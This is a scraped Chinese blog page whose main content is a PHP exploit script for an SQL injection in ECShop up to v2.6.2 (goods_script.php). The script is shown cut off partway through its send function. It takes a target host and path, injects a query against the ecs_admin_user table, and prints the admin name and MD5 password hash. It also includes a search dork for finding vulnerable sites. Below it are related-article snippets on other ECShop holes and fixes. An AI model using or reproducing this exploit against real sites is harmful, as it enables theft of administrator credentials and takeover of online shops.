ecshop goods.php,ECShop goods_script.php注射漏洞

最新推荐文章于 2021-03-23 00:53:36 发布
最新推荐文章于 2021-03-23 00:53:36 发布
阅读量227 收藏
点赞数
文章标签: ecshop goods.php

#!/usr/bin/php

<?php

print_r(\'

+---------------------------------------------------------------------------+

ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit

by puret_t

mail: puretot at gmail dot com

team: http://bbs.wolvez.org

dork: \"Powered by ECShop\"

+---------------------------------------------------------------------------+

\');

/**

* works with register_globals = On

*/

if ($argc < 3) {

print_r(\'

+---------------------------------------------------------------------------+

Usage: php \'.$argv[0].\' host path

host: target server (ip/hostname)

path: path to ecshop

Example:

php \'.$argv[0].\' localhost /ecshop/

+---------------------------------------------------------------------------+

\');

exit;

}

error_reporting(7);

ini_set(\'max_execution_time\', 0);

$host = $argv[1];

$path = $argv[2];

$resp = send();

preg_match(\'#href=\"([\\S]+):([a-z0-9]{32})\"#\', $resp, $hash);

if ($hash)

exit(\"Expoilt Success!\\nadmin:\\t$hash[1]\\nPassword(md5):\\t$hash[2]\\n\");

else

exit(\"Exploit Failed!\\n\");

function send()

{

global $host, $path;

$cmd = \'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x\'.bin2hex(\'all\').\' LIMIT 1#\';

$data = \"POST \".$path.\"goods_script.php?type=\".time().\" HTTP/1.1\\r\\n\";

$data .= \"Accept: */*\\r\\n\";

$data .= \"Accept-Language: zh-cn\\r\\n\";

$data .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";

$data .= \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\\r\\n\";

$data .= \"Host: $host\\r\\n\";

$data .= \"Content-Length: \".strlen($cmd).\"\\r\\n\";

$data .= \"Connection: Close\\r\\n\\r\\n\";

$data .= $cmd;

Frozen Tilapia
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Ecshop漏洞及修复
欣馨密语
05-11 1322
ECShop存在一个盲注漏洞,问题存在于/api/client/api.php文件中,提交特制的恶意POST请求可进行SQL注入攻击,可获得敏感信息或操作数据库。 路径:/api/client/includes/lib_api.php 参照以下修改: function API_UserLogin($post) { /* SQL注入过滤 */ if (get_magic_...
ecshop pages.lbi.php,ecshop程序经常被挂马的漏洞修复方法
weixin_34856444的博客
03-17 191
很多开源程序由于缺乏定期的维护和升级,这样经过一段时间的使用逐渐的一些网站漏洞就暴露出来了,进而一些搞破坏的站长就开始利用这些漏洞对网站植入木马,黑链,或者爆破网站的后台等一系列的操作。那么该如何预防呢?其实每款开源程序都有自己的修复方法,比如给文件夹设置为只可以读不可以写的权限了,或者找到网站的漏洞进行修复了,或者定期的打补丁等等。由于最近很多站长朋友在php免备案空间玩ecshop这款开源程序...
ecshop 2.6.2 版本的sql注入漏洞
yangjiehuan的专栏
08-24 1374
简要:      这个漏洞不是我发现的。现在目前2.7.3也已经改了,所以放上来,是为了说明变量初始化的重要性。 refer link:http://bbs.wolvez.org/viewtopic.php?pid=179#p179 内容: 影响2.5.x和2.6.x,其他版本未测试 goods_script.php44行:     if (empty($_GET['type']
ecshop漏洞修复整理
热门推荐
龚清林的博客
06-01 6万+
1、ECShop存在一个盲注漏洞,问题存在于/api/client/api.php文件中,提交特制的恶意POST请求可进行SQL注入攻击,可获得敏感信息或操作数据库。 路径:/api/client/api.php、/api/client/includes/lib_api.php 参照以下修改: function API_UserLogin($post) { /* SQL注入过滤 ...
ecshop漏洞user.php,ECSHOP 漏洞重放及屏蔽规则
weixin_28903391的博客
03-23 415
ECSHOP 的user.php文件存在文件上传漏洞测试:域名改为自己的哟!curl -sI "http://www.xxxxxx.com/user.php?act=login" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) huaxiaspider/1.0 (https://www.xxxx.cn/spider.html)" --referer "5...
ECshop修改教程.doc
05-14
$goods.url}" title="{$goods.name}" style="float:left;">{$goods.name|truncate:7} ;"> {$goods.shop_price} {/if} <!-- {/foreach} --> ``` 二、去版权与标志 去版权与标志是 ECshop 的一个基本设置。...
丝芙兰.zip源码ECSHOP网站模板打包下载
03-12
丝芙兰.zip源码ECSHOP网站模板打包下载丝芙兰.zip源码ECSHOP网站模板打包下载 1.适合个人搭建网站参考 2.适合学生毕业设计搭建网站参考 3.适合小公司搭建网站参考
ecshop微信商城接口 v2.1.zip
07-14
wch_goods.php ———— 商品搜索 wch_member.php ———— 会员相关, wch_userBonus.php ———— 会员红包,优惠券 wch_jfye.php ———— 积分余额 wch_qiandao.php ———— 会员签到 wch_wxpay.php ——...
ecshop微信商城接口php版v2.1
08-02
ecshop微信商城接口,实现商品融合,关注注册,发放... 接口文件说明 weicaihong.php ———— 入口文件 wch_goods.php ———— 商品搜索 wch_member.php ———— 会员相关, wch_userBonus.php ———— 会员红包,优惠
每日同步更新水货手机价格的插件 for ECSHOP.zip
07-14
适用用户:使用ecshop 搭建手机销售网站的朋友 功能:同步更新获胜手机网每日华强北水货手机批发报价到网站.水货手机每日价格都有变动,节省大量的更新价格的时间哦 一.安装: 1.在mysql 执行 DB.sql ,请修改相应...
ecshop SQL注入通杀漏洞以及后台拿SHELL
11-25 8422
ecshop SQL注入通杀漏洞以及后台拿SHELL 文章来源:小灰博客|时间:2013-12-10 16:09:59|作者:Leo |2 条评论 文章分类:安全技术    标签: 安全教程 发现本地有家商城太自大了,真是目中无人啊…果断拿下给个警告,下面记载下这个Ecshop通杀漏洞吧! 先用下面的代码看下表的前缀(运气好下面的代码就把账号密码注射出来了) search.ph
Ecshop主要文件功能介绍,Ecshop文件详细说明
A11085013的专栏
06-20 2706
1、学习地址: http://source.zuimoban.com/ecshop/nav.html?index.html ecshop主要文件功能说明 模板文件说明 style.css – 模板所使用样式表 activity.dwt – 活动列表 article.dwt – 文章内容页 article_cat.dwt – 文章列表页 article_pro.dwt – 前
PHPECSHOP商城的改造成MVC添加商品功能总结
weixin_34160277的博客
05-05 101
PHPECSHOP商城的改造成MVC添加商品功能总结 原始的ECSHOP商城不是MVC的架构,改造成MVC架构. admin后台 Platform =back,登录页面进去是index.php,里面是一个框架集frameset,上面是top,html, 左边是menu.html,滚动条drag.html,右边是main.html,都放在back/view下面, men...
the database tables and fields of ecshop
zzz_781111的专栏
10-10 830
ECSHOP数据库结构参数表序言本次信息整理只为了从事ECSHOP 二次开发人员方便之举,因此研究ECSHOP 官方数据结构,如若与官方产生冲突,敬请谅解!此版本属于V2.1.15 此信息属于网上一位朋友注释!另外ECSHOP V2.5 的表结构信息我正在整理中现在先把这份发布上来!QQ:381326730表结构分析ecs_account_log // 用户账目日志表ecs_activity //
ecshop常见漏洞
free_xiaochen的博客
10-13 6701
ECSHOP 常见注入漏洞分析和修复方法     优易软件为大家整理 一些ecshop 常见注入漏洞分析和修复方法,在对ecshop使用操作上能够得到一些便利。 1.测试版本 v2.7.3 RELEASE 20121106(最新) v2.7.3 RELEASE 20120411 2.漏洞条件 需登录到后台
ecshop 全系列版本网站漏洞 远程代码执行sql注入漏洞
网站安全专家
09-13 2560
ecshop漏洞于2018年9月12日被某安全组织披露爆出,该漏洞受影响范围较广,ecshop2.73版本以及目前最新的3.0、3.6、4.0版本都受此次ecshop漏洞的影响,主要漏洞是利用远程代码执行sql注入语句漏洞,导致可以插入sql查询代码以及写入代码到网站服务器里,严重的可以直接获取服务器的管理员权限,甚至有些网站使用的是虚拟主机,可以直接获取网站ftp的权限,该漏洞POC已公开,使用...
ecshop测试_ECShop最新4.1.0前台免登录SQL注入0day漏洞披露与分析
weixin_36124631的博客
01-19 1176
0x00 漏洞概述影响版本:ecshop4.1.0及以下是否需要身份认证:否,前台漏洞漏洞类型:SQL注入CNVD编号:CNVD-2020-58823,https://www.cnvd.org.cn/flaw/show/2454613漏洞来源:xcheck代码安全检查源码获取:https://www.ecshop.com/,登录注册下载,最新版本为4.1.1(已修复)。0x01 漏洞详情...
flow.php 漏洞,Ecshop存在诸多SQL注射漏洞--flow.php
weixin_34741145的博客
03-10 115
from:http://www.wooyun.org/bugs/wooyun-2012-011066详细说明:flow.php[php]elseif ($_REQUEST['step'] == 'update_cart'){if (isset($_POST['goods_number']) && is_array($_POST['goods_number'])){flow_upda...
: ecshop_ v4. 1. 6_ _utf8_ re lease20210624882 10902351063. zip
最新发布
09-15
ecshop_v4.1.6_utf8_re lease20210624882 10902351063.zip是一个文件的命名。根据命名可以推测出该文件是ECShop电商系统的一个版本,版本号是v4.1.6,并采用了UTF-8编码。文件名中的release20210624882表示该文件是在2021年6月24日发布或者打包的,882是可能的版本号或者发布号。10902351063可能是该文件的标识号或者与该文件相关的编号。 ECShop是一个开源的电商系统,提供了完整的电子商务解决方案。v4.1.6是ECShop系统的一个具体版本,可能是该系统的最新版本,其中通过UTF-8编码支持了更多的字符集,以满足更多国家和地区的语言需求。 在zip文件的压缩包中可能包含了ECShop系统的安装程序、源代码文件、数据库等相关内容。用户可以使用解压缩软件将zip文件解压缩,并按照ECShop官方提供的安装指南进行系统的部署和配置。 通过这个文件,用户可以获取最新的ECShop系统,以搭建自己的电商网站或者进行二次开发,实现个性化的电商功能和界面设计。同时,ECShop还提供了完善的技术支持和社区资源,用户可以在使用中遇到问题时寻求帮助和交流经验。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值